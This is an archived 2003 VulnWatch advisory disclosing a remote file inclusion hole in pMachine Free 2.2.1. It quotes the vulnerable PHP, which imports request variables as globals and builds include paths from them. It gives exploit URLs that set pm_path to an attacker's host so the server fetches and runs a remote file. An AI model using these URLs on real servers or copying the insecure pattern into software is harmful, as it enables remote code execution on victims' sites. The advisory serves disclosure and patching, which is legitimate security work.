[VulnWatch] pMachine (PHP) : Include() Security Hole

• Previous message: KF: "SRT2003-06-13-0945 - Progress PATH based dlopen() issue"
• Next in thread: martin f krafft: "Re: pMachine (PHP) : Include() Security Hole"
• Reply: martin f krafft: "Re: pMachine (PHP) : Include() Security Hole"
• Reply: silentscripter: "[VulnWatch] Multiple vulnerabilities in paBox"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Informations :
°°°°°°°°°°°°°
Language : PHP
Version : Free 2.2.1
Website : http://www.pmachine.com
Problem : Include() Security Hole


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
This will work if register_globals is ON *OR* OFF.
/pm/lib.inc.php :
-------------------------------------------------------------
if (isset($HTTP_COOKIE_VARS))
{
   while(list($var,$val)=each($HTTP_COOKIE_VARS))
   {
       $$var=$val;
   }
}
if (isset($HTTP_GET_VARS))
{
   while(list($var,$val)=each($HTTP_GET_VARS))
   {
       $$var=$val;
   }
}
if (isset($HTTP_POST_VARS))
{
   while(list($var,$val)=each($HTTP_POST_VARS))
   {
       $$var=$val;
   }
}
if (isset($HTTP_SERVER_VARS))
{
   while(list($var,$val)=each($HTTP_SERVER_VARS))
   {
       $$var=$val;
   }
}

include ("{$pm_path}config$sfx");

if ($debug == 1)
   error_reporting(E_ALL);
else
   error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING);

include ("{$pm_path}db/db.$database$sfx");
include ("{$pm_path}db/db.tables$sfx");
include ("{$pm_path}lib/pmcode.fns$sfx");
include ("{$pm_path}lib/archives.fns$sfx");
include ("{$pm_path}lib/benchmark.class$sfx");
include ("{$pm_path}lib/birthday.fns$sfx");
include ("{$pm_path}lib/calendar.fns$sfx");
include ("{$pm_path}lib/category.fns$sfx");
include ("{$pm_path}lib/censor.fns$sfx");
include ("{$pm_path}lib/comment.fns$sfx");
include ("{$pm_path}lib/deprecated.fns$sfx");
include ("{$pm_path}lib/email.fns$sfx");
include ("{$pm_path}lib/encoded.email$sfx");
include ("{$pm_path}lib/forum.fns$sfx");
include ("{$pm_path}lib/hitcounter.fns$sfx");
include ("{$pm_path}lib/hittracking.fns$sfx");
include ("{$pm_path}lib/ip.fns$sfx");
include ("{$pm_path}lib/linking.fns$sfx");
include ("{$pm_path}lib/mailinglist.fns$sfx");
include ("{$pm_path}lib/member.fns$sfx");
include ("{$pm_path}lib/memberfiles$sfx");
include ("{$pm_path}lib/message.fns$sfx");
include ("{$pm_path}lib/minicalendar.fns$sfx");
include ("{$pm_path}lib/password.fns$sfx");
include ("{$pm_path}lib/pblock.fns$sfx");
include ("{$pm_path}lib/search.fns$sfx");
include ("{$pm_path}lib/shared.fns$sfx");
include ("{$pm_path}lib/stats.fns$sfx");
include ("{$pm_path}lib/tellafriend.fns$sfx");
include ("{$pm_path}lib/timelock.fns$sfx");
include ("{$pm_path}lib/weblog.fns$sfx");
include ("{$pm_path}cp/xmlparser$sfx");
include ("{$pm_path}cp/rss.cp$sfx");
include ("{$pm_path}xmlrpc/ping.fns$sfx");
include ("{$pm_path}xmlrpc/xmlrpc.inc");
---------------------------------------------------------------------


Exploit :
°°°°°°°
http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/&sfx=.txt with :
http://[attacker]/config.txt
or
http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/&sfx=/badcode.txt 
with :
http://[attacker]/config/badcode.txt

etc...


Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info.


More Details In French :
°°°°°°°°°°°°°°°°°°°°°°
http://www.frog-man.org/tutos/pMachineFree2.2.1.txt

_________________________________________________________________

• Next message: gilbert vilvoorde: "[VulnWatch] XSS Vulnerability in LedNews (CGI/Perl) v0.7"
• Previous message: KF: "SRT2003-06-13-0945 - Progress PATH based dlopen() issue"
• Next in thread: martin f krafft: "Re: pMachine (PHP) : Include() Security Hole"
• Reply: martin f krafft: "Re: pMachine (PHP) : Include() Security Hole"
• Reply: silentscripter: "[VulnWatch] Multiple vulnerabilities in paBox"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Jun 14 2003 - 20:40:25 PDT